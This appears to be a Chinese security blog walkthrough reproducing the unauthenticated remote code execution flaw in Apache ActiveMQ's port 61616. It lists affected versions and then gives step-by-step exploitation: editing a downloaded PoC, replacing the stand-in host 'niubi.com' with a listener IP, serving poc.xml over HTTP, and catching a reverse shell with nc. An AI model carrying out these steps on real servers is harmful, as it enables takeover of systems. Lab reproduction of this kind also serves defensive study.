漏洞概述
当未经身份认证的攻击者访问 Apache ActiveMQ 的 61616 端口时,可通过发送恶意数据在远程服务器上执行代码,进而控制 Apache ActiveMQ 服务器。
版本影响
Apache ActiveMQ < 5.18.3
Apache ActiveMQ < 5.17.6
Apache ActiveMQ < 5.16.7
Apache ActiveMQ < 5.15.16
漏洞复现
环境详细
- Apache ActiveMQ服务器:192.168.74.133
- 攻击机:192.168.74.148
POC下载
Github: Apache ActiveMQ远程代码执行(RCE)利用工具
- 下载POC文件:Apache-ActiveMQ-RCE
修改POC
- 修改 ActiveMQ.java
- 将 String ip 的值修改为 Apache ActiveMQ服务器地址
- 将 String pocxml 的值修改为poc.xml的url地址
- 修改 poc.xml
- 将 “niubi.com” 修改为 NC监听机的IP地址
编译&运行POC
- 攻击机编译POC
javac ActiveMQ.java
- 攻击机运行http.server,将poc.xml放到当前目录
python3 -m http.server
- 攻击机NC监听9999端口
nc -lvp 9999
- 攻击机运行POC
java ActiveMQ
- 成功获取 Apache ActiveMQ服务器 的Shell
🎖︎GetShell
THE END
- 最新
- 最热
只看作者